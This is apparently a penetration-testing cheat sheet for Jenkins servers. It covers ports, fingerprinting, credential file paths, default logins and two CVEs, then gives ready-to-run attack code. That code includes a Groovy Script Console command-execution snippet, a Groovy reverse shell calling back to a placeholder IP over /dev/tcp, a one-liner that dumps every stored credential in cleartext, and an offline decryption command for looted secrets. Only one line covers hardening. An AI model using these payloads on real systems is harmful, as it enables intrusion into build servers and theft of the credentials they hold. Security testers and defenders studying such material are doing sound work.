Jenkins
aka Hudson
CI/CD automation server on 8080. The Groovy Script Console is direct RCE, build steps run commands, and the secrets directory plus credentials.xml store recoverable credentials.
Ports
| Port | Proto | Notes |
|---|---|---|
8080 | tcp | Jenkins web UI |
50000 | tcp | agent (JNLP) port |
Fingerprint
- X-Jenkins response header reveals the version
- Login page or, on misconfig, an open dashboard
Key files
| Path | Holds | Sensitive |
|---|---|---|
/var/lib/jenkins/secrets/ | master.key and hudson.util.Secret to decrypt stored creds | sensitive |
credentials.xml | encrypted service credentials | sensitive |
jobs/<job>/config.xml | build steps and sometimes inline secrets | sensitive |
Default / weak creds
admin; some instances leave the Script Console open
Service users
jenkins (or SYSTEM on Windows controllers)
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2024-23897 | Arbitrary file read via the CLI (pre-auth in many configs) |
| CVE-2018-1000861 | Unauthenticated RCE via the Stapler/Groovy chain |
Exploitation primitives
- Manage Jenkins -> Script Console: Groovy 'cmd'.execute() runs as the Jenkins user (often SYSTEM)
- Add a shell build step to a job for execution
- Decrypt credentials.xml using secrets/master.key + hudson.util.Secret
Overview
Jenkins on 8080 automates builds, which means it is built to run code. The Script Console is the fastest path, and even read-only access plus the secrets directory recovers stored credentials.
Script Console RCE
Run a command (Manage Jenkins → Script Console):
println "id".execute().textReverse shell (Groovy):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<YOUR_IP>/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Decrypt stored credentials
From the Script Console, dump every stored credential in cleartext:
com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{ println(it.id + " : " + it.getPassword()) }Decrypt a single {AQAAABAA...} blob from a job config:
println(hudson.util.Secret.decrypt("{AQAAABAAAAA...}"))Offline, with the files looted from secrets/ + credentials.xml:
python3 jenkins_offline_decrypt.py master.key hudson.util.Secret credentials.xmlHardening
Require auth on everything, lock down the Script Console, run controllers as a low-priv user, and patch the CLI file-read CVE.
Seen on these machines 1
